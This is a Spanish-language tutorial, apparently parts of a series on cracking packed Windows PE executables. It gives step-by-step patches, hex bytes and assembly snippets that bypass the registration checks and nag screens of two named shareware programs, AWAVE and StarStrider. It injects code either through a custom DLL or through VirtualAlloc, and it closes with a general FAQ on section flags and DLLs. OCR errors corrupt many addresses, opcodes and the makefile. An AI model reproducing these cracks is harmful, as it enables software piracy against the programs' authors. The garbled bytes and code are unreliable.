especialmente si no lo escribimos en lenguaje ensamblador. 


Si hacemos que la rutina que rompe las protecciones del programa se ejecuten en su propio 
proceso, me liberaré de la carga que implica enganchar instrucciones en procesos remotos, 


sobrescribir y leer procesos remotos, etc. Esto lo podemos lograr simplemente insertando la 
rutina desprotectora en el mismo ejecutable del programa. Veamos el caso particular de AWAVE 
v4.5. 


El programa presenta dos limitaciones engorrosas. La primera es un NAG que aparece al 
comienzo y que recuerda que se trata de un programa no registrado y retarda el inicio del 
programa. La otra protección importante es que el programa no permite guardar más de un 
archivo por sección. Hay un par de cuestiones secundarias: son dos cadenas, una dice 
"Unregistered copy" y aparece en la parte izquierda del área cliente; la otra dice "(Unreg)" y 
aparece en la "Caption" de la ventana. Aunque no es tarea fácil, eliminaremos estas molestias. 


Si intentamos cargar el programa con SICE, no se disparará la ventana del depurador porque el 
programa está empaquetado y se han cambiado los atributos de las secciones. Entonces creamos 
en SnippetCreator un nuevo proyecto (File/New Project) y llamémosle awave, cuyo target sería 
awave.exe. Revisamos los atributos de las secciones y cambiamos los de las secciones .text y 
.«adata, que son, respectivamente las secciones de código ejecutable y la rutina de descompresión. 
El punto de entrada está en esta última sección. Los atributos deben ser E0000020. 


Cambiados los atributos, encontramos que ahora sí se dispara la ventana de SICE cuando 
cargamos awave.exe con e lloader de Softlce. Tenemos que buscar varias direcciones: 


1. La dirección donde finaliza la rutina de descompresión (VA1: Virtual Addres 
1). Cuando el programa llega a este punto, ya el archivo está totalmente 
descomprimido en la memoria. 


2. Las direcciones de los puntos que deseamos cambiar o parchar. 


3. El desplazamiento en el archivo donde escribiremos el recorte nuevo. Esto no 
se hace con Softlce sino con un editor hexadecimal. 


Como el archivo está empaquetado, existen diferencias sustanciales entre la lista muerta que es el 
archivo mismo y el código vivo ya desempacado que vemos con Softlce. Por este motivo no sirve 
establecer el desplazamiento en el archivo correspondiente a las direcciones de memoria donde 
deben hacerse cambios. Así que la estrategia es agregar una rutina al programa que sobreescriba 
en tiempo de ejecución las rutinas que queremos cambiar. 


Otro cambio que debemos introducir al archivo es el concerniente a la instrucción que entregará 
el control a nuestro nuevo recorte. 


Determinemos el desplazamiento del recorte. Con el editor hexadecimal podemos ubicar un 
espacio vacío en el desplazamiento 0004 3140h. A partir de él y los calculamos la dirección 
virtual de su ubicación utilizando la fórmula: 


Dir Virtual = (Desplazamiento del dato - RawData) + (ImageBase + RVA 
Offset) 


Los datos que necesitamos para este cálculo los hallamos con el mismo Snippet 
Creator. En Snippet Creator activamos el comando "ActionNew Target". 
Pulsamos BROWSE y ubicamos AWAVE.EXE y pulsamos SAVE. Ahora 
activamos "PE Info/View PE header". Encontramos que: 


ImageBase = 0040000h 


Luego activamos "PE Info/View Section Info". Para la sección .text 
encontramos: 


RawData = 1000h 
RVA Offset = 1000h 
RawSize = 042200h 


Comprobamos que es en esta sección donde se encuentra el desplazamiento para 
nuestro injerto. Ahora calculemos la dirección virtual: 


(43140h - 1000h) + (400000h + 1000h) = 00443140h 


Debemos entregar el control a esta rutina cuando el archivo ya esté desempacado. Con Softlce 
hemos ubicado esta rutina: 


0050B54B  0385AC504400 add eax,[ebp+004450AC] ; <- VAO 


0050B551  5B pop eax 
0050B552  ..... 

0050B558 61 popad 
0050B559 7508 jnz 
0050B55B  B801000000 mov eax, 1 
0050B560  02C000 ret OCh 
0050B563 50 push eax 
0050B564  C3 ret 


Debemos insertar en alguna parte de este código la siguiente instrucción, que entregará el control 
al recorte: 


6800443140 push 00443140h 
C3 ret 


Como vemos, la instrucción consta de seis bytes. Analizando el código de más arriba, vemos que 
la instrucción en 50B54B tiene ese tamaño, así que tomamos esa. Calculamos el desplazamiento 
en el archivo correspondiente a esta dir. virtual y es 05454Bh. Si revisamos con el editor 
hexadecimal este desplazamiento veremos que no se corresponden los valores con los que vemos 
en SICE. Lo que ocurre, me imagino, es que se trata de un desempacador compuesto de dos 
partes. El desempacador mismo está empacado. Hay pues dos desempacadores, uno desempaca el 
desempacador del programa. Así que necesitamos una dirección más: la dirección final del 
primer desempacador o ubicar una punto en el primer desempacador donde la instrucción que nos 
toca ya esté desempacada. Ubicada esta dirección, pasamos desde aquí el control al recorte; 
hacemos que el recorte escriba la instrucción 0050B54B para que vuelva a pasar el control al 
recorte, que romperá ahora las protecciones sobre el archivo desplegado. 


Para hallarla, cargamos el ejecutable en Softlce y hacemos: 


D 50B54B 


Esto desplegará en la ventana de datos de Softlce el contenido en hexadecimal que hay en 
0050B534B. Luego ejecutamos F10 hasta ver en la ventana de datos de Softlce algo como esto: 
0385AC504400. 


Yo he determinado esta dirección: 


0050B0B7  8B85B5504400 mov eax, [ebp + 004450B5] ; <- VAO 


Como ven, la instrucción tiene seis bytes. 


El desplazamiento de esta dirección en el archivo es 0540B7h. Con el heditor hexadecimal 
escribimos en esta instrucción: 


68 40 31 44 00 C3 


que es el equivalente octal de las instrucciones "push 443140h" - "ret". Cuando se ejecute el 
programa y llegue a este punto, pasará el control a las rutinas escritas en el desplazamiento 
043140h del archivo, correspondiente a la dirección virtual 00443140h del programa. 


La rutina del recorte deberá incluir una rutina que restaure la instrucción que hemos modificado 
(en 0050B0B7) y que modifique el final del segundo desempacador, cuando el programa ya está 
totalmente desempacado, para que se entregue el control de nuevo a una rutina que introducirá 
por fin los cambios definitivos en el programa. 


Tenemos ya las siguientes direcciones: 


1. Dirección de la instrucción que entregará por primera vez el control al recorte. 
Final del primer desempacador: 50B0B7h. La llamamos VAO. 

2. Dirección del recorte en el archivo: 00443140h. VA2. 

3. Dirección de la instrucción que devolverá por segunda vez el control al recorte 
50B54Bh. La llamamos VA1. 


Ahora, queda romper las protecciones para obtener las últimas direcciones: las que hay que 
cambiar para desproteger el programa. Necesito estas direcciones para escribir el código del 
recorte. Por razones de tiempo no entraré en detalles y las daré de inmediato: 


Para registrar el programa debes enviar un email a su autor y cancelarle no sé 
cuántos dólares. Luego recibirás a través de cualquier mecanismo un archivo 
.TXT o .KEY que debes abrir con el programa: "OptionsProgram 
SetupWRegister”. Este proceso es engorroso, así que puedes hacer lo siguiente 
para disfrutar el programa en toda su plenitud: 


1. En el registro de Win, en la clave HKCUSoftwarelEMJ-SoftwarelAwave: 
Crear nuevo valor de cadena: Username "mi nombre" 


2. Aplicar los parches 


En  0047EFCC: 7540 ¿nz 0047FO0E 
Poner 0047EFCC: EBOD ¡mp 0047EFDB 


En 0047EFEC: 7405  jz 0047E7F3 
Poner 0047EFEC: EB09 jmp 0047EFF3 


Como ya lo he mencionado, esto no se puede hacer directamente. Tenemos que injertar un 
recorte en el PE que lo haga. Pero tenemos que anotar estas direcciones: 0047EFCCHh y 
0047EFECH, así como las instrucciones nuevas: "EBODh" y"EB09h". 


Problemas 


Puedo escribir el código del recorte de manera que realice los parches deseados, injertarlo donde 
he elegido y supuestamente todo andaría bien. Pero hay un problema: cuando el programa es 
desempacado en la memoria ocupa y reescribe el espacio donde ubicamos el recorte 
destruyéndolo : (. Así que estamos obligados a otra estrategia: escribir el recorte para que cargue 
en memoria una librería DLL que escribiremos y que realizará los parches en el momento 


preciso. Como la librería DLL va a ocupar un espacio de memoria reservado para ella, el archivo, 
al ser desempacado no podrá dañar su código : ) 


La estrategia es escribir el recorte para que sólo haga los siguiente: 


1. restaurar la instrucción original en la dirección donde el programa entrega el control al recorte 
2. cargar nuestra DLL en el espacio de direcciones del proceso. 
3. cambiar la dirección del final del desempacador para que pase el control a la DLL. 


Procedamos 


1. Abrimos el target con el editor hexadecimal y colocamos la siguiente cadena de valores 
hexadecimales en el desplazamiento 50B54Bh correspondiente a la dirección VAO 


2. Escribimos el siguiente código en la ventana de edición de SC: 


3. Antes de ensamblarlo nos aseguramos de especificar los siguiente: 


4. Ensamblamos el recorte. Si no hubo error lo exportamos: 


5. Cerramos SC y abrimos el target con HexWorkShop. Nos movemos al desplazamiento 
0043140h donde colocaremos el recorte. 


6. Abrimos con HexWorkshop el archivo .BIN que exportamos, lo marcamos todo con el ratón y 
lo copiamos (CTRL+C). 


7. Pasamos a la ventana de Hexworkshop con la vista de EXE. Marcamos con el ratón desde 
0043140h hasta 00431B0h; el área que hemos marcado corresponde exactamente al tamaño del 
recorte, y hay que ser muy preciso en esta operación ya que es la más delicada del proceso. 
Pegamos el recorte (CTRL+V). 


8. Guardamos y salvamos un respaldo por seguridad. 


9. Ahora escribimos la DLL. En editor de texto aparte escribamos el siguiente código y 
salvémosle como AW_PATCH.ASM. 


TITLE AW_PATCH.DLL: Registra el programa awave v3.4 


386 
.model flat, STDCALL 


public patch 
public Start 


data 
OldInstruction db 003h,085h,0ACh,050h,044h,000h 


.code 

Start: 

dll proc instance: DWORD, reason:DWOROD, reserved:.DWORD 
mov eax, 1 

ret 

dll endp 


patch: 

; Parchar el target para simular registro 
pushad 

mov edi,0047EFCCh 

mov word ptr [edi], 0ODEBh 

mov edi,0047EFECHh 

mov word ptr [edi],009EBh 


; Restaurar código en 0050B54Bh 
mov edi,0050B54Bh 

lea esi,OldInstruction 

mov ecx,6 

rep movsb 

; Tegresar 

popad 

push 0050B54Bh 

ret 


End Start 


LIBRARY aw_patch 

EXPORTS MyAboutDialog 

EXPORTS patch 

DESCRIPTION 'ASM program' 

EXETYPE WINDOWS 

CODE PRELOAD MOVEABLE 

DATA PRELOAD MOVEABLE MULTIPLE 


NAME = aw_patch 
OBJS = S(NAME).obj 
DEF = $(NAMEB).def 
RES = S(NAMEB).rc 
RES = S(NAMEB).res 


IMPORT=CATAMibumport32 


TASMDEB UG2/z1i 
LINKDEBUG=/v 


S(NAMEB).DLL: $(OBJS) S(RES) S(DEF) 
tlink32 /Tpd /aa /c SCOBJS),FK(NAMEB),, SIMPORT), S(DEPF), S(NAME) 


.asm.obj: 
tasm32 /ml /m2 $4%.asm 


.IC.res 
: brc32 -r S(NAMB).rc 


Con esto sólo tenemos que ejecutar desde la línea de comando la orden MAKE, mientras apunta 
al directorio donde está los archivos fuentes ( C:Memplaw_patch, por ejemplo). 


Una vez creada nuestra DLL, la colocamos en el mismo directorio del recorte. Ensamblado el 
recorte y pegado en la dirección indicada de la víctima. 


Finalmente awave.exe: ¡Ja, ja! 


ALGUNAS PREGUNTAS - ALGUNAS RESPUESTAS 


¿Las jmp de las apis están siempre en secciones .text? 


Creo que no necesariamente. Por el trabajo con SC y por un post en el foro Spanish Reverse 
Engineering me he enterado que los nombres importados no tienen que estar en la sección .idata. 
Los programas W32 trabajan con un modelo de memoria FLAT; es como un archivo DOS 
.COM, pero sin el límite estrecho de 65 KB: el límite son 4 GB. Todo está un gran segmento de 4 
GB. Datos y Código puede ir en cualquier parte. El único límite, hasta dónde he visto, son 
precisamente los atributos de las secciones donde se ubican los datos brutos. Por eso, yo creo, 
aunque no lo he probado, que uno puede poner en una sección de datos inicializados lo siguiente: 


THUNKI1: ¡mp [api_address] 
Y llamar a la API desde una instrucción así: 
call THUNK1 


En teoría debería trabajar. No lo he probado todavía. 


¿Cuál es el significado de las características de las secciones? Todavía no entiendo porque 
modificándolas, también se modifica la carga del ejecutable (y se despliega el Sice en la 
primera instrucción). 


He adelantado alguito antes. Las PCs están basadas en una arquitectura llamada von Newmann. 
Si quieres saber quien es este tipo teo envío la info. Se le considera erróneamente el padre de la 
computadora moderna. La verdad es que fue un matemático bestial, muy activo durante la 2da. 
Guerra. Fue uno de los impulsores del proyecto ENIAC, si no me equivoco. Necesitaban 
computadoras para cálculos avanzados y, especialmente para crackear claves y mensajes. De ahí 
surgió también la cibernética de Norbert Wiener. Más importante en esta arquitectura, para mí, es 


A. Turing, el de la máquina universal. 


Lo cierto es que el descubrimiento de estos tipos fue el tratamiento del código de un programa 
como si fueran sus datos. Gracias a esto, se pueden almacenar las secuencias de instrucciones 
como si fueran datos. W32 le saca la punta a esto y aprovecha el modelo de memoria FLAT de 
los procesadores INTEL x86. Ya te he explicado qué es este modelo. Hay más info en las 
referencias de los procesadores de este tipo. Ahora bien, como cualquier cosa puede ser dato, 
incluso el código, a cada sección del PE se le dan algunos atributos durante el enlazado para 
discriminar un poco entre lo que es dato y lo que es código, donde puede escribirse y donde no, 
etc. Cuando un archivo es comprimido, a las secciones se le dan atributos de datos, por lo que el 
depurador, que sólo lee código, no las leerá. Es más, si le das a las secciones de datos atributos de 
código, te las desplegará hasta el W32DASM. 


La siguiente tabla ilustra el significado de las características: 


- DO0000020h __ Código. 

- 0O00000040h __ Datos inicializados. 

- DOO000080h __ Datos no inicializados. 

- 040000000h _ Sección cacheable. 

- 080000000h _ Sección paginable. 

- 100000000h __Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 8$00000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es E0000020H, entonces se trata de una sección en la que 


1. se pueden escribir datos 80000000h 


2. se pueden leer datos 40000000h 
3. ejecutable 20000000h 
4. hay código 00000020h 

E0000020h 


¿Qué es una DLL y para qué sirve? ¿cómo se crea? 


DLL es la extensión de archivos empleados por Window$ para enlace dinámico. DLL es la 
abreviatura de Dinamic Link Library, que significa librería de enlace dinámico. 


Un archivo DLL está compuesto por un conjunto de funciones y rutinas que pueden ser 


empleadas y llamadas desde un archivo ejecutable .EXE o desde cualquier otra .DLL. El uso de 
estas funciones se llama enlace dinámico porque se trata de un "enlace" semejante al realizado 
cuando enlazamos archivos .OBJ y .RES con el enlazador (linker) para crear ejecutables .EXE, 
pero que ocurre en tiempo de ejecución y sin el uso de enlazador. 


Esto fue implementado por Window$ considerando que muchas rutinas empleadas por varios 
programas eran las mismas. Para evitar perdida de espacio de memoria, WindowS$ reúne esas 
rutinas comunes en archivos DLL que pueden ser accedidas, una vez cargadas en el área de 
memoria compartida de un proceso, por más de un programa o proceso. 


Pero las DLL no sólo ahorran espacio de memoria útil. También ofrecen otras ventajas. Cómo se 
encuentran en un área de memoria compartida del proceso, son una vía de acceso a proyectos 
remotos. Es algo complejo, pero se puede hacer. Además de esto, las DLL permiten agregar 
código a un programa sin tener que cambiar el ejecutable para nada: se podría hacer 
actualizaciones importantes de programas sólo cambiando una DLL. 


¿Cómo escribir una DLL? 


Toda DLL tiene un punto de entrada el cual será llamado por Win cada vez que 


- la DLL sea cargada 
- la DLL sea descargada 
- un hilo sea creado en el mismo proceso 


Este es un ejemplo del código del punto de entrada de una DLL: 


DIIEntry proc hInstDLL:HINSTANCE, reason:DWORD, reserved1: DWORD 
mov eax,TRUE 
ret DIlEntry Endp 


El punto de entrada puede tener cualquier nombre y apunta a una función con tres parámetros: 
- hInstDll = manejador de instancia del módulo DLL. 


- reason = bandera con uno los siguientes valores: 

DLL_PROCESS_ATTACH: La DLL recibe este valor cuando injertado por vez primera en el 
espacio de direcciones del proceso. Se puede usar esta posibilidad para hacer inicialización. 
DLL_PROCESS_DETACH: La DLL recibe este valor cuando está siendo descargada del espacio 
de direcciones del proceso. Se puede usar esta posibilidad para hacer una limpieza como 
deslocalización de memoria. 


DLL_THREAD_ATTACH: La DLL recibe este valor cuando el proceso crea un nuevo hilo. 
DLL_THREAD_DETACH : La DLL recibe este valor cuando un hilo del proceso es destruido 


Para que la DLL sea cargada dentro de un proceso, debe retornar TRUE en eax. En caso 
contrario, no será cargada. 


Las funciones de la DLL pueden ser colocadas antes o después de la entrada. Pero para que 
puedan ser llamadas desde otros programas, deben colocarse las siguientes líneas en el archivo 
DEF de definición: 


LIBRARY DLL_Name 
EXPORTS Function_Name 


La directiva LIBRARY define el nombre del módulo DLL. Debe señalarse con el nombre de 
archivo de la DLL. La directiva EXPORTS dice al enlazador (linker) cuales funciones de la DLL 
son exportadas, es decir, pueden ser llamadas desde otros programas. 


¿Cómo compilar y enlazar un archivo DLL? 
También hay que indicar en los conmutadores del enlazador la opción /DLL y /DEF:DEF_name: 
link /DLL /SUBSYSTEM:WINDOWS /DEF:DEF_name /LIBPATH:c:imasm32Mib OBJ_name.obj 
Los conmutadores del ensamblador son los mismos: 
le Icoff /Cp 
En el caso de Borland Turbo Assembler, en vez de /DLL, se coloca /T'pd: 
tlink32 /Tpd /aa /c /v SCOBJS),S(NAMB),, SMPORT), S(DEP), S(NAME) 


Después de enlazar el archivo objeto, se obtendrá la DLL y un archivo .lib. Este archivo .lib es la 
librería de importación que puede ser usada para enlazar programas que usan las funciones que 
está en la DLL. 


Para que un ejecutable EXE u otra DLL llame a funciones dentro de una DLL, debe proyectar 
primero la DLL en el espacio de direcciones del proceso que llama. 


¿Como cargar la DLL en el espacio de nombres del proceso ? 


Hay dos maneras: 


1. Enlazado implícito: es el más común. Como hemos visto al crear aplicaciones W32, al enlazar 
un ejecutable debemos indicar un conjunto de archivos LIB al enlazador. Estos archivos LIB 
contienen una lista de las funciones de la DLL que pueden ser importadas desde otros archivos 
EXE o DLL. Cuando hacemos el enlace, el enlazador toma información de los archivos LIB 
correspondientes y la incrusta en el archivo EXE creado. Luego, cuando el sistema cargue el 
EXE, el cargador examinará el encabezado de este archivo y establecerá las DLLs que deberán 
ser cargadas en el espacio de direcciones del proceso para que se ejecute la aplicación. El sistema 
buscará las DLLs requeridas en los directorios de sistema e intentará cargarlas. 


2. Enlazado explícito: llamando a LoadLibrary con el nombre de la DLL deseada. Si la función 
tiene éxito, devuelve un manejador a la librería (DLL). Si no, retornará NULL: 


invoke LoadLibrary,addr LibName 


El manejador devuelto se puede pasar a GetProcAddress o a cualquier otra librería que requiera 
este manejador como parámetro: 


mov hLib,eax 
invoke GetProcAddress,hLib,addr FunctionName 


Esta llamada devuelve la dirección de la función cuyo nombre ha sido pasado como segundo 
parámetro. De otra manera, retorna NULL. El valor devuelto ahora puede ser usado para llamar a 
la función deseada: 


mov TestHelloAddr,eax 
call [TestHelloAddr] 


Usada la librería DLL, se descarga con FreeLibrary: 


invoke FreeLibrary,hLib 2. 


Gracias a: 


GERZA, ManiacPC y KuT. 


Comentarios y correcciones: nuMIT_orCiname.com 
Mi página de programación: nuMIT_ors Programming Page 


CRACKEAR ARCHIVOS PE 
EMPAQUETADOS (III) 
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Tools: SnippetCreator v1.5 
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Intro 


Bien amigos, seguro que alguna vez han encontrado programas fácil de desproteger pero que 
presentan el problema de estar empacados y no es tan fácil parcharlos. Algunos crackers han 
superado este obstáculo empleando parcheadores de procesos (process partchers). Recientemente, 
y podemos constatarlo en los fabulosos tutoriale de R!SC, otros crackers detectan con un 
depurador -debugger- como Soft Ice los puntos donde colocar en archivo ejecutable los parches y 
en un breve análisis del ejecutable mismo ubica dónde insertar un recorte -snippet- que parche el 
programa cuando se despliega en memoria para su ejecución. A veces esto es relativamente 
sencillo, pero otras veces no tanto. Yo he implementado el uso de DLLs cuando el recorte es muy 
grande [ver CRACKEAR ARCHIVOS PE EMPAQUETADOS (1 1 )] y el tamaño es un parámetro 
crítico. Ahora implementaré otro método para esto que me ha parecido más sencillo y mejor 
porque no requiere archivos adicionales: aprovechar las APIs del manejo de memoria virtual de 
Windows. 


¿Cuándo usar este método? 


Cuando el espacio donde se ubica el recorte es limpiado y barrido por el programa en el momente 
que el archivo ejecutable es desempacado y no queremos usar una DLL para evitar esto. 


Esta técnica consiste en escribir el recorte de código y moverlo a un lugar seguro en la misma 
memoria del proceso, pero lejos del área de despliegue del ejecutable. De esta manera cuando se 
despliegue el programa no podrá alcanzar el recorte y destruirlo. Entonces el programa pasará el 
control al recorte en memoria para que el recorte de código parche el programa y lo desprotega 
(si éste es nuestro objetivo). 


AtAkEee... je-j¡Ée 


Si cargamos el archivo StarStrider.exe con Softlce e intetamos desplegar su contenido, no se 
disparará la ventana del depurador porque el programa está empaquetado y se han cambiado los 
atributos de las secciones. 


A esta altura ya deberíamos tener una idea de cómo desplegar el programa de un archivo 
empacado en Soft Ice. Abrimos el archivo con un editor de archivos PE (ProcDump o 
SnippetCreator) y cambiamos las características de la sección de código. Con SnippetCreator 
procedemos así: 


Creamos en SnippetCreator un nuevo proyecto (File/New Project) y llamémosle SS, cuyo target 
sería StarStrider.exe. Recabamos información sobre el encabezado del archivo (PE InfoWView 
PE Header): 


Address Entry Point: 00 06 E0 00 h 


Ahora cambiamos las características de la sección de código (por lo general .text o .code). 
Ejecutamos PE InfoWView Section Info. Vemos que el punto de entrada coincide con la 
dirección de inicio de la sección .aspack. Anotemos de una vez los siguientes valores de .aspack: 


V. Offset:  0006E000h 
Raw Offset: 00025400h 


Así que hacemos click con el botón derecho del ratón sobre .text (la sección de código) y 
elegimos Edit Section en el menú emergente; pulsamos el botón "...” de "Characteristics", 
elegimos IMAGE_SCN_CNT_CODE y IMAGE_SCN_CNT_EXECUTE y pulsamos el botón 
"Save". Ahora en en el campo "Characteristics" aparece E0 00 00 60h. 


Después de realizar esta operación con StartStrider.exe, carguémoslo con el "loader" de Softlce y 
empleando F10, F9 y FS estratégicamente busquemos el final del la rutina que desempaca el 
archivo: 


0157:0046E5B1 50 PUSH EAX 

0157:0046E5B2 038548304400 ADD EAX,[EBP+004430A8] 
0157:0046E5B8  5B POP EBX 

0157:0046E5B9  OBDB OR EBX,EBX 
0157:0046E5BB  8985E12E4400 MOV [EBP+00442EE1],EAX 
0157:0046E5C1 61 POPAD 

0157:0046E5C2 7508 JNZ 0046E5CC 
0157:0046E5CC  68305E4200 PUSH 00425E30 
0157:0046E5D1  C3 RET 


Vamos a necesitar un espacio de seis bytes para la nueva instrucción, así que escogemos: 
0157:0046E5BB  8985E12E4400 MOV [EBP+00442FE1],EAX 


Como antes, llamamos a esta dirección RVA1: es la dirección que entrega el control a nuestro 
recorte parchador. 


Como en otros casos que he analizado, esta instrucción también está empaquetada, así que para 
parcharla y reescribir en ella las instrucciones que entregan el control al recorte tenemos que 
esperar hasta que la instrucción misma sea desempacada porque si no, cuando la instrucción se 
despkliegue corroerá nuestro parche. Esto nos obliga a encontrar un punto anterior para dar el 
controla nuestro de código. Para esto ejecutamos en Softlce el comando: D RVA1 =D 
0046E3BB. En la ventana de datos podemos ir revisando hasta que en ella aparezca el código 
octal correspondiente a las instrucciones que queremos localizar. 


Cargamos StarStrider.exe con el "loader" de Softlce, ejecutamos el comando D 0046E3BB y 
vamos trazando el programa con la tecla F10 hasta ver en la ventana de datos: 


0030:0046E5BB  2EE18589 75610044 00 
Es la representación en octal en reverso y ordenada en valores dword de: 
8985E12E4400 MOV [EBP+00442EE1],EAX 


La instrucción que buscamos se despliega cuando se ejecuta la instrucción 0157:0046E0E7: 


0157:0046E0E7  F3A4 REPZ MOVSB ; <- 

0157:0046E0E9  8B8541294400 MOV EAX,[EBP+00442941] ; <- VAO 
0157:0046E0EF 6800800000 PUSH 00008000 

0157:0046E0F4  6A00 PUSH 00 

0157:0046E0F6 50 PUSH EAX 

0157:0046E0F7  FF9549294400 CALL [EBP+00442949] 
0157:0046E0FD  8D851D2C4400 LEA EAX,[EBP+00442C1D] 
0157:0046E103 50 PUSH EAX 

0157:0046E104  C3 RET 


Así que podemos elegir la instrucción 0046E0E9, una instrucción de seis bytes y que se realiza 
cuando la instrucción VA1 ya está desplegada. Llamamos a esta instrucción VAO. 


Ahora tenemos que localizar un espacio para nuestro recorte de código. Podemos hacer esto con 
el editor hexadecimal y sin mucho tecnisismo. Abrimos StarStrider.exe con HexWorkshop y 
buscamos "manualmente" un espacio con gran cantidad de ceros. Hay varios, pero elegimos el 
espacio que comienza en el desplazamiento del archivo 00 01 DC 00 h. ¿Por qué? por intuición: a 
la vista parece suficiente. 


Para realizar nuestro trabajo tenemos que convertir el desplazamiento en el archivo a dirección 
virtual. Para eso aplicamos la siguiente fórmula: 


VA del recorte = (Desplazamiento del recorte - RawOffset de la Sección) + (ImageBase + 
VirtualOffset de la sección) 


Tenemos que ubicar en qué sección está el espacio para el recorte y especificar dónde comienza 
esa sección. 


Vemos que el recorte está entre, es decir, en la sección .rsrc, que inicia en la dirección virtual 
(VA) 00 04 00 00 h y cuyo desplazamiento en el archivo es 01 DC 00h. 


Aplicando la fórmula tenemos: 
(00025260h - 0001DC00h) + (00400000h + 00040000h) = 00447660h 


Sólo nos queda ubicar las instrucciones que necesitamos cambiar para que el programa tenga el 
comportamiento de un programa registrado. 


Como supongo que el lector de este escrito ya debe tener cieta destreza ubicando los puntos 
frágiles de un programa, no explicaré como encontrarlo. Además ese no es el objeto de este 
escrito sino el aprender una estrategia para parchar archivos empaquetados. Así que de una vez 
indico que la instrucción a cambiar es: 


0157:0042FBA3 51 PUSH ECX 


0157:0042FBA4 52 PUSH EDX 
0157:0042FBAS  E8D6000000 CALL 0042FC80 
0157:0042FBAA — 85C0 TEST EAX,EAX 
0157:0042FBAC 7340 JNZ 0042FBEE 
0157:0042FBEE  BB88080000 MOV EBX,00000888 
0157:0042FBF3  8BC3 MOV EAX,EBX 
0157:0042FBF5  5B POP EBX 
0157:0042FBF6 SE POP ESI 
0157:0042FBF7  81C4D0000000 ADD ESP,000000DO 
0157:0042FBFD  C21400 RET 0014 


Es muy simple lo que tenemos que hacer. Reemplazar la instrucción 


0157:0042FBAA — 85C0 TEST EAX,EAX 
por: 
0157:0042FBAA  EB2B JMP 0042FBD”7 


Con esta instrucción saltamos todas las pruebas que comprueban si el programa ha sido 
registrado hasta la dirección 0042FBD7, que es la dirección a donde debería llegar el programa si 
estuviera registrado. 


El Recorte 


Ahora lo decisivo: escribir el recorte. Corremos Snippet Creator y abrimos el proyecto SS que 
creamos al principio. 


Establecemos las opciones del proyecto: 


He descubierto que (aunque no sé porqué motivo) algunas acciones hechas por Snippet Creator 
sobre archivo PE empaquetados deterioran el archivo. Así que muchas opciones de Snippet 
Creator que podrían ahorrarnos trabajo no se pueden emplar cuando injertamos código nuevo en 
ejecutables. Así que nos conformaremos con las siguientes opciones (ejecutamos Action Project 
Options para desplegar el diálogo Project Options): 


Snippet VA: 477660 
Patch Options: Patch Into Existing Section 
Address to Redirect Control to the Snippet: No Redirection 


Return Control To Program: Don't Return Control To Program 


Otras opciones que no hemos podico elegir tendremos que realizarlas nosotros mismos 
"manualmente". No es difícil hacerlo. 


Este es el recorte de código: 


extrn LoadLibraryA:near 
extrn GetProcAddress:near 


jmp numitl 


11 db 'kernel32.d11',0 

f1 db "VirtualAlloc',0 

OldInstruction db 08Bh,085h,041h,029h,044h,000h 
NewInstruction db 068h,000h,000h,000h,000h,0C3h 


numitl: 

; Restaurar antigua instrucción 
pushad mov esi,offset OldInstruction 
mov edi,46E0E9h 

mov ecx,6 

rep movsb 


; Obtiene la dirección de la función VirtualAlloc en la memoria del proceso 
push offset 11 

call [LoadLibraryA] 

push offset f1 

push eax 

call [GetProcAddress] 


; Reservar espacio en memoria para el recorte 
mov esi,(final - init) 

push esi 

call eax,0,es1,1000h,40h 


; Mover el código a la memoria 
mov edi,eax 

lea esi,init 

pop ecx 


rep movsb 


; Escribir el salto al código en memoria 
mov edi,46E5BBh 

lea esi,NewInstruction 

mov dword ptr [esi+1],eax 

mov ecx,6 rep movsb 


; Regresar 
popad 

push 46E0E9h 
ret 


init: 
pushad 


; Restaurar instrucción original 
mov edi,46E5BBh 

mov dword ptr [edi],02EE18589h 
mov word ptr [edi+4],0044h 


; Escribir el parche 
mov edi,42FBAAh 
mov word ptr [edi],2BEBh 


; Regresar 
popad 

push 46E5BBh 
ret 

final: 


Puedes ver que este código, cuando toma el control por vez primera: 


- Restaura la instrucción original en VAO = 46E0E9h 

- Obtiene la dirección de las funciones VirtualAlloc y VirtualFree. 

- Compromete memoria física con la función VirtualAlloc. 

- Mueve el recorte de código parchador a la región de memoria comprometida. 

- Cambia la instrucción en la dirección 46E5BBh para que en una segunda ocasión devuelva 
una váz más el control al recorte, ahora en el área de memoria comprometida. 

- Devuelve el control al programa en la dirección VAO. 


Cuando el programa vuelve a tomar el control y alcanza la dirección VA, devuelve por segunda 
vez el control al recorte, ahora ubicado en una región de memoria que previamente 
comprometimos para él. En esta segunda ocasión el código de recorte: 


- Restaura la instrucción original en VA1 = 46E5BBh 
- Parcha el proceso en VA2 = 42FBAAh 
- Retorna el control al programa. 


La parte interesante del recorte es: 


; Obtiene la dirección de la función VirtualAlloc en la memoria del proceso 

push offset 11 

call [LoadLibraryA] 

push offset f1 

push eax 

call [GetProcAddress] ; Devuelve en eax la dirección de VirtualAlloc, en este caso. 


; Reservar espacio en memoria para el recorte 
mov esi, (final - init) > Tamaño del recorte 
push esi 

call eax,0,es1,1000h,40h . 


; Mover el código a la memoria 

mov edi,eax ; Dirección dónde se halla el recorte 

lea esi,init  ; Dirección del recorte en el código fuente 
pop ecx ; Tamaño del recorte 

rep movsb ; Mover el recorte 


Este código es lo que permite no tener que usar DLEs ni loaders, y evita tener que aumentar el 
tamaño del ejecutable PE que estamos tratando. 


Ahora ensamblamos el recorte (click sobre el botón "Assemble"), exportamos el binario y lo 
llamamos SS.BIN 


Patching 


Abrimos una vista de nuestro target y otra del binario SS.BIN que hemos exprotado. Marcamos 
con el ratón toda el área correspondiente al código de nuestro binario SS.BIN y lo copiamos 
(CTRL+C). Luego marcamos el área del ejecutable StarStrider.exe correspondiente al espacio 
donde insertaremos el recorte: desde 025260h hasta 025326h y pegamos el binario que copiamos 
antes (CTRL+V). Repito una vez más que esta es la operación más delicada del proceso: copiar 
un byte de más o de menos daña por completo el archivo empacado. 


Lo último que nos queda es escribir en el ejecutable StarStrider.exe la instrucción en VAO = 
46E0E9h que entregará por vez primera el control al recorte. Calculemos el desplazamiento: 


Desplazamiento en el Archivo = (VAO - VA de la sección ) + RawOffset de la Sección 


El salto está en la sección .aspack cuya (VA) es 46E000h y cuyo desplazamiento en el archivo es 


(46E0E9h - 46E000h ) + 00025400h = 254E9h 


Nos movemos ahora en el editor hexadecinal (HexWorkshop) hasta 254E9h (EditiGoto) y 
escribimos: 


68 60 76 44 00 C3 


Es el código en octal que corresponde a las instrucciones 


6860764400 push 00447660 ; VA2 
C3 ret 


